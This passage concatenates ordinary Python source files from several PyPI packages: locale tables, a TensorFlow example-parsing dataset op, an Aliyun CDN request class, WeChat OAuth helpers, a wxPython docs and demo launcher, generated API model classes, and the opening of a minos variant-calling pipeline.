'Angola', 'AN': 'Netherlands Antilles', 'AQ': 'Antarctica', 'AS': 'American Samoa', 'AR': 'Argentina', 'AU': 'Australia', 'AT': 'Austria', 'AW': 'Aruba', 'IN': 'India', 'TZ': 'Tanzania', 'AZ': 'Azerbaijan', 'IE': 'Ireland', 'ID': 'Indonesia', 'UA': 'Ukraine', 'QA': 'Qatar', 'MZ': 'Mozambique'}
months=['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
abbrMonths=['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
days=['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
abbrDays=['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
dateFormats={'medium': '%m %d, %y', 'full': '%%(dayname)s, %%(monthname)s %d, %Y', 'long': '%%(monthname)s %d, %Y', 'short': '%m/%d/%y'}
numericSymbols={'group': ',', 'nativeZeroDigit': '0', 'exponential': 'E', 'perMille': u'\u2030', 'nan': u'\ufffd', 'decimal': '.', 'percentSign': '%', 'list': ';', 'patternDigit': '#', 'plusSign': '+', 'infinity': u'\u221e', 'minusSign': '-'} | PypiClean |
/tensorflow_directml-1.15.8-cp37-cp37m-win_amd64.whl/tensorflow_core/python/data/experimental/ops/parsing_ops.py | """Experimental `dataset` API for parsing example."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import structure
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import gen_experimental_dataset_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.util.tf_export import tf_export
class _ParseExampleDataset(dataset_ops.UnaryDataset):
"""A `Dataset` that parses `example` dataset into a `dict` dataset."""
def __init__(self, input_dataset, features, num_parallel_calls):
self._input_dataset = input_dataset
if not structure.are_compatible(
input_dataset.element_spec,
tensor_spec.TensorSpec([None], dtypes.string)):
raise TypeError("Input dataset should be a dataset of vectors of strings")
self._num_parallel_calls = num_parallel_calls
# pylint: disable=protected-access
self._features = parsing_ops._prepend_none_dimension(features)
# sparse_keys and dense_keys come back sorted here.
(sparse_keys, sparse_types, dense_keys, dense_types, dense_defaults,
dense_shapes) = parsing_ops._features_to_raw_params(
self._features, [
parsing_ops.VarLenFeature, parsing_ops.SparseFeature,
parsing_ops.FixedLenFeature, parsing_ops.FixedLenSequenceFeature
])
# TODO(b/112859642): Pass sparse_index and sparse_values for SparseFeature.
(_, dense_defaults_vec, sparse_keys, sparse_types, dense_keys, dense_shapes,
dense_shape_as_shape) = parsing_ops._process_raw_parameters(
None, dense_defaults, sparse_keys, sparse_types, dense_keys,
dense_types, dense_shapes)
# pylint: enable=protected-access
self._sparse_keys = sparse_keys
self._sparse_types = sparse_types
self._dense_keys = dense_keys
self._dense_defaults = dense_defaults_vec
self._dense_shapes = dense_shapes
self._dense_types = dense_types
input_dataset_shape = dataset_ops.get_legacy_output_shapes(
self._input_dataset)
dense_output_shapes = [input_dataset_shape.concatenate(shape)
for shape in dense_shape_as_shape]
sparse_output_shapes = [input_dataset_shape.concatenate([None])
for _ in range(len(sparse_keys))]
output_shapes = dict(
zip(self._dense_keys + self._sparse_keys,
dense_output_shapes + sparse_output_shapes))
output_types = dict(
zip(self._dense_keys + self._sparse_keys,
self._dense_types + self._sparse_types))
output_classes = dict(
zip(self._dense_keys + self._sparse_keys,
[ops.Tensor for _ in range(len(self._dense_defaults))] +
[sparse_tensor.SparseTensor for _ in range(len(self._sparse_keys))
]))
self._element_spec = structure.convert_legacy_structure(
output_types, output_shapes, output_classes)
variant_tensor = (
gen_experimental_dataset_ops.parse_example_dataset(
self._input_dataset._variant_tensor, # pylint: disable=protected-access
self._num_parallel_calls,
self._dense_defaults,
self._sparse_keys,
self._dense_keys,
self._sparse_types,
self._dense_shapes,
**self._flat_structure))
super(_ParseExampleDataset, self).__init__(input_dataset, variant_tensor)
@property
def element_spec(self):
return self._element_spec
# TODO(b/111553342): add arguments names and example names as well.
@tf_export("data.experimental.parse_example_dataset")
def parse_example_dataset(features, num_parallel_calls=1):
"""A transformation that parses `Example` protos into a `dict` of tensors.
Parses a number of serialized `Example` protos given in `serialized`. We refer
to `serialized` as a batch with `batch_size` many entries of individual
`Example` protos.
This op parses serialized examples into a dictionary mapping keys to `Tensor`
and `SparseTensor` objects. `features` is a dict from keys to `VarLenFeature`,
`SparseFeature`, and `FixedLenFeature` objects. Each `VarLenFeature`
and `SparseFeature` is mapped to a `SparseTensor`, and each
`FixedLenFeature` is mapped to a `Tensor`. See `tf.io.parse_example` for more
details about feature dictionaries.
Args:
features: A `dict` mapping feature keys to `FixedLenFeature`,
`VarLenFeature`, and `SparseFeature` values.
num_parallel_calls: (Optional.) A `tf.int32` scalar `tf.Tensor`,
representing the number of parsing processes to call in parallel.
Returns:
A dataset transformation function, which can be passed to
`tf.data.Dataset.apply`.
Raises:
ValueError: if features argument is None.
"""
if features is None:
raise ValueError("Missing: features was %s." % features)
def _apply_fn(dataset):
"""Function from `Dataset` to `Dataset` that applies the transformation."""
out_dataset = _ParseExampleDataset(dataset, features, num_parallel_calls)
if any(
isinstance(feature, parsing_ops.SparseFeature)
for _, feature in features.items()
):
# pylint: disable=protected-access
# pylint: disable=g-long-lambda
out_dataset = out_dataset.map(
lambda x: parsing_ops._construct_sparse_tensors_for_sparse_features(
features, x), num_parallel_calls=num_parallel_calls)
return out_dataset
return _apply_fn | PypiClean |
/aliyun-python-sdk-cdn-3.8.8.tar.gz/aliyun-python-sdk-cdn-3.8.8/aliyunsdkcdn/request/v20180510/AddCdnDomainRequest.py |
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcdn.endpoint import endpoint_data
class AddCdnDomainRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2018-05-10', 'AddCdnDomain')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Sources(self): # String
return self.get_query_params().get('Sources')
def set_Sources(self, Sources): # String
self.add_query_param('Sources', Sources)
def get_ResourceGroupId(self): # String
return self.get_query_params().get('ResourceGroupId')
def set_ResourceGroupId(self, ResourceGroupId): # String
self.add_query_param('ResourceGroupId', ResourceGroupId)
def get_SecurityToken(self): # String
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self, SecurityToken): # String
self.add_query_param('SecurityToken', SecurityToken)
def get_CdnType(self): # String
return self.get_query_params().get('CdnType')
def set_CdnType(self, CdnType): # String
self.add_query_param('CdnType', CdnType)
def get_Scope(self): # String
return self.get_query_params().get('Scope')
def set_Scope(self, Scope): # String
self.add_query_param('Scope', Scope)
def get_Tags(self): # RepeatList
return self.get_query_params().get('Tag')
def set_Tags(self, Tag): # RepeatList
for depth1 in range(len(Tag)):
if Tag[depth1].get('Value') is not None:
self.add_query_param('Tag.' + str(depth1 + 1) + '.Value', Tag[depth1].get('Value'))
if Tag[depth1].get('Key') is not None:
self.add_query_param('Tag.' + str(depth1 + 1) + '.Key', Tag[depth1].get('Key'))
def get_TopLevelDomain(self): # String
return self.get_query_params().get('TopLevelDomain')
def set_TopLevelDomain(self, TopLevelDomain): # String
self.add_query_param('TopLevelDomain', TopLevelDomain)
def get_OwnerAccount(self): # String
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self, OwnerAccount): # String
self.add_query_param('OwnerAccount', OwnerAccount)
def get_DomainName(self): # String
return self.get_query_params().get('DomainName')
def set_DomainName(self, DomainName): # String
self.add_query_param('DomainName', DomainName)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
def get_CheckUrl(self): # String
return self.get_query_params().get('CheckUrl')
def set_CheckUrl(self, CheckUrl): # String
self.add_query_param('CheckUrl', CheckUrl) | PypiClean |
/pywe-oauth-1.1.2.tar.gz/pywe-oauth-1.1.2/pywe_oauth/oauth.py |
import shortuuid
from pywe_base import BaseWechat
from six.moves import urllib_parse
class Oauth(BaseWechat):
def __init__(self):
super(Oauth, self).__init__()
# 网页授权获取用户基本信息, Refer: http://mp.weixin.qq.com/wiki/17/c0f37d5704f0b64713d5d2c37b468d75.html
# 移动应用微信登录开发指南, Refer: https://open.weixin.qq.com/cgi-bin/showdocument?action=dir_list&t=resource/res_list&verify=1&id=open1419317851&token=&lang=zh_CN
self.WECHAT_OAUTH2_AUTHORIZE = self.OPEN_DOMAIN + '/connect/oauth2/authorize?appid={appid}&redirect_uri={redirect_uri}&response_type=code&scope={scope}&state={state}&forcePopup={forcePopup}#wechat_redirect'
self.WECHAT_OAUTH2_ACCESS_TOKEN = self.API_DOMAIN + '/sns/oauth2/access_token?appid={appid}&secret={secret}&code={code}&grant_type=authorization_code'
self.WECHAT_OAUTH2_USERINFO = self.API_DOMAIN + '/sns/userinfo?access_token={access_token}&openid={openid}'
# 第三方平台代公众号发起网页授权, https://open.weixin.qq.com/cgi-bin/showdocument?action=dir_list&t=resource/res_list&verify=1&id=open1419318590&token=&lang=zh_CN
self.WECHAT_COMPONENT_OAUTH2_AUTHORIZE = self.OPEN_DOMAIN + '/connect/oauth2/authorize?appid={appid}&redirect_uri={redirect_uri}&response_type=code&scope={scope}&state={state}&component_appid={component_appid}#wechat_redirect'
self.WECHAT_COMPONENT_OAUTH2_ACCESS_TOKEN = self.API_DOMAIN + '/sns/oauth2/component/access_token?appid={appid}&code={code}&grant_type=authorization_code&component_appid={component_appid}&component_access_token={component_access_token}'
self.WECHAT_COMPONENT_OAUTH2_USERINFO = self.API_DOMAIN + '/sns/userinfo?access_token={access_token}&openid={openid}&lang=zh_CN'
def get_oauth_code_url(self, appid=None, redirect_uri=None, scope='snsapi_base', redirect_url=None, component=False, component_appid=None, force_popup=False):
if component:
return self.get_component_oauth_code_url(appid=appid, redirect_uri=redirect_uri, scope=scope, redirect_url=redirect_url, component_appid=component_appid)
return self.WECHAT_OAUTH2_AUTHORIZE.format(
appid=appid,
redirect_uri=urllib_parse.quote_plus(redirect_uri),
scope=scope,
state=urllib_parse.quote_plus(redirect_url),
forcePopup='true' if force_popup else 'false',
)
def get_access_info(self, appid=None, secret=None, code=None, component=False, component_appid=None, component_access_token=None):
if component:
return self.get_component_access_info(appid=appid, code=code, component_appid=component_appid, component_access_token=component_access_token)
return self.get(self.WECHAT_OAUTH2_ACCESS_TOKEN, appid=appid, secret=secret, code=code)
def get_userinfo(self, access_token=None, openid=None, component=False):
if component:
return self.get_component_userinfo(access_token=access_token, openid=openid)
return self.get(self.WECHAT_OAUTH2_USERINFO, access_token=access_token, openid=openid)
def get_component_oauth_code_url(self, appid=None, redirect_uri=None, scope='snsapi_base', redirect_url=None, component_appid=None):
return self.WECHAT_COMPONENT_OAUTH2_AUTHORIZE.format(
appid=appid,
redirect_uri=urllib_parse.quote_plus(redirect_uri),
scope=scope,
state=urllib_parse.quote_plus(redirect_url),
component_appid=component_appid,
)
def get_component_access_info(self, appid=None, code=None, component_appid=None, component_access_token=None):
return self.get(self.WECHAT_COMPONENT_OAUTH2_ACCESS_TOKEN, appid=appid, code=code, component_appid=component_appid, component_access_token=component_access_token)
def get_component_userinfo(self, access_token=None, openid=None):
return self.get(self.WECHAT_COMPONENT_OAUTH2_USERINFO, access_token=access_token, openid=openid)
def get_oauth_redirect_url(self, oauth_uri, scope='snsapi_base', redirect_url=None, default_url=None, direct_redirect=None, force_popup=None, random_str=True):
"""
# https://a.com/wx/oauth2?redirect_url=redirect_url
# https://a.com/wx/oauth2?redirect_url=redirect_url&default_url=default_url
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url&default_url=default_url
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url&default_url=default_url&direct_redirect=true
# https://a.com/wx/oauth2?scope=snsapi_base&redirect_url=redirect_url&default_url=default_url&direct_redirect=true&force_popup=true
# https://a.com/wx/o?r=redirect_url
# https://a.com/wx/o?r=redirect_url&d=default_url
# https://a.com/wx/o?s=snsapi_base&r=redirect_url
# https://a.com/wx/o?s=snsapi_base&r=redirect_url&d=default_url
# https://a.com/wx/o?s=snsapi_base&r=redirect_url&d=default_url&dr=true
# https://a.com/wx/o?s=snsapi_base&r=redirect_url&d=default_url&dr=true&fp=true
"""
oauth_url = oauth_uri.format(scope, urllib_parse.quote_plus(redirect_url), urllib_parse.quote_plus(default_url)) if default_url else oauth_uri.format(scope, urllib_parse.quote_plus(redirect_url))
oauth_url = '{0}&dr=true'.format(oauth_url) if direct_redirect else oauth_url
oauth_url = '{0}&fp=true'.format(oauth_url) if force_popup else oauth_url
oauth_url = '{0}&rs={1}'.format(oauth_url, shortuuid.uuid()) if random_str else oauth_url
return oauth_url
oauth = Oauth()
get_oauth_code_url = oauth.get_oauth_code_url
get_access_info = oauth.get_access_info
get_userinfo = oauth.get_userinfo
get_component_oauth_code_url = oauth.get_component_oauth_code_url
get_component_access_info = oauth.get_component_access_info
get_component_userinfo = oauth.get_component_userinfo
get_oauth_redirect_url = oauth.get_oauth_redirect_url | PypiClean |
/wxPython-zombie-3.1.5.6.tar.gz/wxPython-zombie-3.1.5.6/wx/tools/wxget_docs_demo.py | from __future__ import (division, absolute_import, print_function, unicode_literals)
import sys
import os
import subprocess
import webbrowser
import tarfile
if sys.version_info >= (3,):
from urllib.error import HTTPError
import urllib.request as urllib2
import urllib.parse as urlparse
from urllib.request import pathname2url
else:
import urllib2
from urllib2 import HTTPError
import urlparse
from urllib import pathname2url
import wx
from wx.tools import wxget
print(sys.version_info, sys.version, sys.argv)
APP = None
if wx.VERSION[0] != 4:
raise ValueError("wx Versions other than 4 not currently supported!")
def ensure_wx_app():
""" Ensure that there is a wx.App instance."""
global APP
if APP is None and not wx.GetApp():
APP = wx.App()
APP.SetAppName("wxPython")
return (APP is not None)
def get_paths_dict():
""" Get a dictionary of the required paths."""
global APP
ensure_wx_app()
sp = wx.StandardPaths.Get()
pathdict = {}
pathdict['TempDir'] = sp.GetTempDir()
pathdict['Cache'] = os.path.join(sp.GetUserLocalDataDir(), 'wxDocsDemoCache',
wx.VERSION_STRING)
pathdict['Docs_URL'] = wxget.get_docs_demo_url(False)
#pathdict['wxDocs'] = os.path.join(sp.GetAppDocumentsDir(), 'wxDocs', wx.VERSION_STRING)
pathdict['wxDocs'] = sp.GetAppDocumentsDir()
pathdict['Docs_Name'] = "wxPython-docs-%s" % wx.VERSION_STRING
pathdict['Demo_URL'] = wxget.get_docs_demo_url(True)
#pathdict['wxDemo'] = os.path.join(sp.GetUserLocalDataDir(), 'wxDemo', wx.VERSION_STRING)
pathdict['wxDemo'] = sp.GetUserLocalDataDir()
pathdict['Demo_Name'] = "wxPython-demo-%s" % wx.VERSION_STRING
pathdict['Ext'] = 'tar.gz'
return pathdict
def unpack_cached(cached, dest_dir):
""" Unpack from the cache."""
print('Unpack', cached, 'to', dest_dir)
with tarfile.open(cached, "r:*") as tf:
tf.extractall(dest_dir)
dest_dir = os.listdir(dest_dir)[0]
return dest_dir
def get_item(final, url, cache, name, ext, forced=False):
""" Get the item """
print('Looking for', name, 'at', final)
fullpath = os.path.join(final, name)
if os.path.exists(fullpath) and not forced: # Already exists
return fullpath
cached = os.path.join(cache, name)
cached = os.path.extsep.join([cached, ext])
print('Looking for cached', cached)
if not os.path.exists(cached) or forced: # No cached copy
yes_no = wx.MessageBox(
"\n".join(
["%s is not yet installed." % name,
"Go on-line to get it?",
"(Select No on charged or slow connections)"]),
"Download Prompt", wx.YES_NO|wx.CENTER|wx.ICON_INFORMATION)
if yes_no == wx.YES:
cached = wxget.download_file(url, cache, force=forced, trusted=True)
else:
report_error("Download Cancelled!")
if os.path.exists(cached): # We now have a cached copy
unpack_cached(cached, final)
else:
fullpath = None
return fullpath
def report_error(err_text):
""" Report a problem."""
ensure_wx_app()
wx.MessageBox(err_text, caption='ERROR!',
style=wx.OK|wx.CENTRE|wx.ICON_ERROR)
def done(result=0):
""" Tidy up and exit."""
global APP
if APP:
print("Closing Launcher App!") # Debug
if result:
print(result)
wx.Exit()
print("Done!")
sys.exit(result)
def docs_main(args=sys.argv):
""" Get/Launch Docs."""
ensure_wx_app()
result = 0
print("Launch Docs for wxPython V%s" % wx.VERSION_STRING)
pd = get_paths_dict()
location = get_item(pd['wxDocs'], pd['Docs_URL'], pd['Cache'],
pd['Docs_Name'], pd['Ext'], forced="--force" in args)
if location:
location = os.path.join(location, 'docs', 'html', 'index.html')
location_url = urlparse.urljoin('file:', pathname2url(location))
print("Show Docs at:", location)
webbrowser.open(location_url)
else:
result = 'Unable to find and show the wxPython Documentation!'
report_error(result)
done(result)
def demo_main(args=sys.argv):
""" Get/Launch Demo."""
result = 0
ensure_wx_app()
print("Launch Demo for wxPython V%s" % wx.VERSION_STRING)
pd = get_paths_dict()
location = get_item(pd['wxDemo'], pd['Demo_URL'], pd['Cache'],
pd['Demo_Name'], pd['Ext'], forced="--force" in args)
if location:
cmds = [sys.executable, os.path.join(location, "demo", "demo.py")]
print("Launching", cmds[1])
pid = subprocess.Popen(cmds).pid
#subprocess.check_call(cmds) # Use instead for debug
print("Demo starting as PID %s - may take a few seconds!" % pid)
else:
result = 'Unable to find and start the wxPython Demo!'
report_error(result)
done(result)
def main(args=sys.argv):
""" Command line main."""
if len(args) > 1:
if "demo" in args[1].lower():
return demo_main()
elif "docs" in args[1].lower():
return docs_main()
#else:
print(__doc__)
#else:
#APP = wx.App()
if __name__ == "__main__":
main() | PypiClean |
/esse3_student-3.7.0-py3-none-any.whl/esse3_student/tui/reservations.py | import asyncio
from esse3_student import cli
from textual.app import ComposeResult
from textual.binding import Binding
from textual.widgets import Static, Button, Footer, Checkbox
from textual.containers import Container, Horizontal, Vertical
from textual.screen import Screen
from rich import box
from rich.table import Table
class Header(Static):
pass
class Reservations(Screen):
class ViewReservations(Static):
def __init__(self, reservation, index: int) -> None:
self.reservation = reservation
self.index = index
super().__init__()
def table(self, reservation, index: int):
table = Table(box=box.SIMPLE_HEAD, style="rgb(139,69,19)")
table.add_column("#", justify="center", style="bold red")
for colum in reservation.keys():
if colum == "Name":
table.add_column(colum, justify="center", style="bold cyan", no_wrap=True)
elif colum == "Date":
table.add_column(colum, justify="center", style="bold yellow")
elif colum == "Cancella Prenotazione":
table.add_column(colum, justify="center", style="bold red")
else:
table.add_column(colum, justify="center", style="bold #f7ecb5")
row = list(reservation.values())
table.add_row(str(index), *row)
self.update(table)
def on_mount(self) -> None:
self.table(self.reservation, self.index)
class SelectExams(Horizontal):
def __init__(self, reservation) -> None:
self.values = list(reservation.values())
super().__init__()
def on_mount(self) -> None:
self.mount(self.Name(self.values[0]))
self.mount(self.Check(self.values[0]))
class Name(Static):
def __init__(self, name) -> None:
self.value = name
super().__init__()
def on_mount(self) -> None:
self.update(self.value)
class Check(Checkbox):
def __init__(self, value) -> None:
self.name_value = value
super().__init__()
def on_mount(self) -> None:
self.value = False
self.id = self.name_value
BINDINGS = [
Binding(key="r", action="app.pop_screen", description="return"),
]
async def fetch_date(self) -> None:
wrapper = None
try:
wrapper = cli.new_esse3_wrapper()
except:
await self.query_one(".reservations-loading").remove()
await self.query_one(".exams-container").mount(Static("Login failed !!!", classes="login-failed"))
if wrapper:
reservations = wrapper.fetch_reservations()
await self.query_one(".reservations-loading").remove()
if len(reservations) == 0:
await self.query_one(".exams-container").mount(Static(f"❌ No appeals booked !!", classes="reservations-empty"))
else:
await self.query_one(".exams-container").mount(
Vertical(classes="reservations-table"),
Static("Select the checkboxes of the exams to be removed:", classes="title"),
Container(classes="select-exams-container"),
)
for index, reservation in enumerate(reservations, start=1):
self.query_one(Vertical).mount(self.ViewReservations(reservation, index))
await self.query_one(".select-exams-container").mount(self.SelectExams(reservation))
await self.query_one(".exams-container").mount(Horizontal(Button("remove", id="remove")))
async def on_mount(self) -> None:
await asyncio.sleep(0.1)
asyncio.create_task(self.fetch_date())
def compose(self) -> ComposeResult:
yield Header("Reservations", classes="header")
yield Container(Static("List of Reservations:", classes="title"),
Static("loading [yellow]reservations[/] in progress.....", classes="reservations-loading"),
classes="exams-container")
yield Footer()
class Remove(Screen):
def __init__(self, reservations) -> None:
self.reservations = reservations
super().__init__()
async def fetch_date(self) -> None:
values, click = cli.new_esse3_wrapper().remove(self.reservations)
all_success = True
all_closed = True
for i in values.keys():
if i == 0:
all_success = False
else:
all_closed = False
await self.query_one("#reservations-loading-removed").remove()
if all_closed:
self.query_one(Container).mount(
Static(f"❌ Impossible to remove: [red]{', '.join([x for x in values[0]])}[/] cause subscription closed\n"
f"\n[bold]click saved: [blue]{click}",
classes="reservations-removed-error"))
elif all_success:
self.query_one(Container).mount(
Static(f"Reservations: [green]{', '.join([x for x in values[1]])}[/] removed\n"
f"\n[bold]click saved: [blue]{click}",
id="reservations-removed-success"))
else:
self.query_one(Container).mount(
Static(f"✅ Reservations: [green]{', '.join([x for x in values[1]])}[/] removed \n\n"
f"❌ Impossible to remove: [red]{', '.join([x for x in values[0]])}[/] cause subscription closed\n"
f"\n[bold]click saved: [blue]{click}",
classes="reservations-removed-mix"))
async def on_mount(self) -> None:
await asyncio.sleep(0.1)
asyncio.create_task(self.fetch_date())
def compose(self) -> ComposeResult:
yield Header("Reservations removed page", classes="header")
yield Container(Static("Reservations [yellow]removal[/] in progress.....", id="reservations-loading-removed"))
yield Footer()
BINDINGS = [
Binding(key="r", action="app.return('exams')", description="return"),
Binding(key="h", action="app.homepage('reservations')", description="homepage"),
] | PypiClean |
/py-pure-client-1.38.0.tar.gz/py-pure-client-1.38.0/pypureclient/pure1/Pure1_1_0/models/blade_array_status.py | import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.pure1.Pure1_1_0 import models
class BladeArrayStatus(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'resource_type': 'str',
'used_blades': 'int',
'total_blades': 'int'
}
attribute_map = {
'id': 'id',
'name': 'name',
'resource_type': 'resource_type',
'used_blades': 'used_blades',
'total_blades': 'total_blades'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
resource_type=None, # type: str
used_blades=None, # type: int
total_blades=None, # type: int
):
"""
Keyword args:
id (str): The opaque and unique id of this resource.
name (str): The name of this resource.
resource_type (str): The type of this resource represented by the name of its REST endpoint. For example, \"arrays\", \"network-interfaces\", and \"metrics\". The value may be `null` if the resource is not represented.
used_blades (int): Count of used blade slots in the array.
total_blades (int): Count of total blade slots in the array.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if resource_type is not None:
self.resource_type = resource_type
if used_blades is not None:
self.used_blades = used_blades
if total_blades is not None:
self.total_blades = total_blades
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `BladeArrayStatus`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(BladeArrayStatus, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BladeArrayStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other | PypiClean |
/accelbyte_py_sdk-0.48.0.tar.gz/accelbyte_py_sdk-0.48.0/accelbyte_py_sdk/api/iam/models/model_user_info_response.py |
# template file: ags_py_codegen
# AccelByte Gaming Services Iam Service (7.1.0)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ModelUserInfoResponse(Model):
"""Model user info response (model.UserInfoResponse)
Properties:
display_name: (displayName) REQUIRED str
email_address: (emailAddress) REQUIRED str
namespace: (namespace) REQUIRED str
user_id: (userId) REQUIRED str
"""
# region fields
display_name: str # REQUIRED
email_address: str # REQUIRED
namespace: str # REQUIRED
user_id: str # REQUIRED
# endregion fields
# region with_x methods
def with_display_name(self, value: str) -> ModelUserInfoResponse:
self.display_name = value
return self
def with_email_address(self, value: str) -> ModelUserInfoResponse:
self.email_address = value
return self
def with_namespace(self, value: str) -> ModelUserInfoResponse:
self.namespace = value
return self
def with_user_id(self, value: str) -> ModelUserInfoResponse:
self.user_id = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result: dict = {}
if hasattr(self, "display_name"):
result["displayName"] = str(self.display_name)
elif include_empty:
result["displayName"] = ""
if hasattr(self, "email_address"):
result["emailAddress"] = str(self.email_address)
elif include_empty:
result["emailAddress"] = ""
if hasattr(self, "namespace"):
result["namespace"] = str(self.namespace)
elif include_empty:
result["namespace"] = ""
if hasattr(self, "user_id"):
result["userId"] = str(self.user_id)
elif include_empty:
result["userId"] = ""
return result
# endregion to methods
# region static methods
@classmethod
def create(
cls,
display_name: str,
email_address: str,
namespace: str,
user_id: str,
**kwargs,
) -> ModelUserInfoResponse:
instance = cls()
instance.display_name = display_name
instance.email_address = email_address
instance.namespace = namespace
instance.user_id = user_id
return instance
@classmethod
def create_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> ModelUserInfoResponse:
instance = cls()
if not dict_:
return instance
if "displayName" in dict_ and dict_["displayName"] is not None:
instance.display_name = str(dict_["displayName"])
elif include_empty:
instance.display_name = ""
if "emailAddress" in dict_ and dict_["emailAddress"] is not None:
instance.email_address = str(dict_["emailAddress"])
elif include_empty:
instance.email_address = ""
if "namespace" in dict_ and dict_["namespace"] is not None:
instance.namespace = str(dict_["namespace"])
elif include_empty:
instance.namespace = ""
if "userId" in dict_ and dict_["userId"] is not None:
instance.user_id = str(dict_["userId"])
elif include_empty:
instance.user_id = ""
return instance
@classmethod
def create_many_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> Dict[str, ModelUserInfoResponse]:
return (
{k: cls.create_from_dict(v, include_empty=include_empty) for k, v in dict_}
if dict_
else {}
)
@classmethod
def create_many_from_list(
cls, list_: list, include_empty: bool = False
) -> List[ModelUserInfoResponse]:
return (
[cls.create_from_dict(i, include_empty=include_empty) for i in list_]
if list_
else []
)
@classmethod
def create_from_any(
cls, any_: any, include_empty: bool = False, many: bool = False
) -> Union[
ModelUserInfoResponse,
List[ModelUserInfoResponse],
Dict[Any, ModelUserInfoResponse],
]:
if many:
if isinstance(any_, dict):
return cls.create_many_from_dict(any_, include_empty=include_empty)
elif isinstance(any_, list):
return cls.create_many_from_list(any_, include_empty=include_empty)
else:
raise ValueError()
else:
return cls.create_from_dict(any_, include_empty=include_empty)
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"displayName": "display_name",
"emailAddress": "email_address",
"namespace": "namespace",
"userId": "user_id",
}
@staticmethod
def get_required_map() -> Dict[str, bool]:
return {
"displayName": True,
"emailAddress": True,
"namespace": True,
"userId": True,
}
# endregion static methods | PypiClean |
/bio-minos-0.9.1.tar.gz/bio-minos-0.9.1/minos/multi_sample_pipeline.py | import logging
import os
import shutil
from cluster_vcf_records import vcf_file_read
from minos import dependencies, utils, vcf_file_split_deletions
class Error (Exception): pass
class MultiSamplePipeline:
def __init__(self,
ref_fasta,
input_data_tsv,
output_dir,
max_alleles_per_cluster=5000,
min_large_ref_length=50,
gramtools_max_read_length=0,
gramtools_kmer_size=5,
gramtools_build_threads=1,
nextflow_config_file=None,
nextflow_work_dir=None,
force=False,
no_run=False,
clean=True,
testing=False,
variants_per_split=None,
alleles_per_split=None,
total_splits=None,
nf_ram_cluster_small_vars=2,
nf_ram_gramtools_build_small=12,
nf_ram_minos_small_vars=5,
nf_ram_merge_small_vars=4,
use_unmapped_reads=False,
):
self.ref_fasta = os.path.abspath(ref_fasta)
if not os.path.exists(self.ref_fasta):
raise Error('Reference FASTA file not found: ' + ref_fasta)
self.input_data_tsv = os.path.abspath(input_data_tsv)
if not os.path.exists(self.input_data_tsv):
raise Error('Data TSV file not found: ' + input_data_tsv)
self.output_dir = os.path.abspath(output_dir)
self.nextflow_config_file = None if nextflow_config_file is None else os.path.abspath(nextflow_config_file)
self.max_alleles_per_cluster = max_alleles_per_cluster
self.min_large_ref_length = min_large_ref_length
self.gramtools_max_read_length = gramtools_max_read_length
self.gramtools_kmer_size = gramtools_kmer_size
self.gramtools_build_threads = gramtools_build_threads
